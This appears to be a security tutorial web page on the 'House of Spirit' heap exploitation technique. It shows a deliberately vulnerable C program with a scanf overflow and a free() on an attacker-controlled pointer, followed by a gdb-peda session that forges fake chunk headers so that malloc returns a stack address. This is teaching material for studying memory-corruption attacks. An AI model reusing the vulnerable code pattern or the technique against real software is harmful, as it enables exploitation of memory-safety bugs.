<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
        

List

The House of Spirit

Conditions

Exploit plan

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main(){
	unsigned long *ptr;
	char fakeChunk[160];

	printf("fakeChunk : %p\n",fakeChunk);
	printf("ptr : %p\n",&ptr);

	scanf("%176s",fakeChunk);

	malloc(1000);

	free(ptr);

	char *stack = malloc(0x70);
	char *test1 = malloc(0x70);
	char *test2 = malloc(0x500);

	printf("Stack : %p\n",stack);
}

Exploit flow

Debugging

gdb-peda$ b *0x000000000040067b
Breakpoint 1 at 0x40067b
gdb-peda$ b *0x0000000000400691
Breakpoint 2 at 0x400691
gdb-peda$ b *0x000000000040069b
Breakpoint 3 at 0x40069b
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/heap/spirit 
fakeChunk : 0x7fffffffe1c0
ptr : 0x7fffffffe260
Breakpoint 1, 0x000000000040067b in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1d0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1e0:	0x0000000000000000	0x00007ffff7ffe520
0x7fffffffe1f0:	0x00007fffffffe220	0x00007fffffffe210
0x7fffffffe200:	0x00000000f63d4e2e	0x0000000000400388
0x7fffffffe210:	0x00000000ffffffff	0x00007fffffffe378
0x7fffffffe220:	0x00007ffff7a211f8	0x00007ffff7ff74c0
0x7fffffffe230:	0x00007ffff7ffe1c8	0x0000000000000000
0x7fffffffe240:	0x0000000000000001	0x000000000040071d
0x7fffffffe250:	0x00007fffffffe280	0x0000000000000000
0x7fffffffe260:	0x00000000004006d0	0x0000000000400540
gdb-peda$ ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB
0x0000000000400680 in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x4141414141414141
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x4242424242424242	0x0000000000400500
gdb-peda$ set *0x7fffffffe1c8 = 0x80
gdb-peda$ set *0x7fffffffe1cc = 0x0
gdb-peda$ set *0x7fffffffe248 = 0x10000
gdb-peda$ set *0x7fffffffe24c = 0x0
gdb-peda$ set *0x7fffffffe260 = 0x7fffffffe1d0
gdb-peda$ set *0x7fffffffe264 = 0x7fff
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x0000000000000080
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x00007fffffffe1d0	0x0000000000400500
gdb-peda$
Breakpoint 2, 0x0000000000400691 in main ()
gdb-peda$ i r rdi
rdi            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ p main_arena.fastbinsY 
$3 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni


0x0000000000400696 in main ()
gdb-peda$ p main_arena.fastbinsY 
$4 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7fffffffe1c0, 0x0, 0x0, 0x0} 
gdb-peda$ c
Breakpoint 3, 0x000000000040069b in main ()
gdb-peda$ ni
0x00000000004006a0 in main ()
gdb-peda$ i r rax
rax            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ x/16gx 0x7fffffffe1d0
0x7fffffffe1d0:	0x0000000000000000	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
gdb-peda$ p main_arena.fastbinsY 
$2 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni
...
gdb-peda$ i r rax
rax            0x602400	0x602400
gdb-peda$ 

Related information

<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>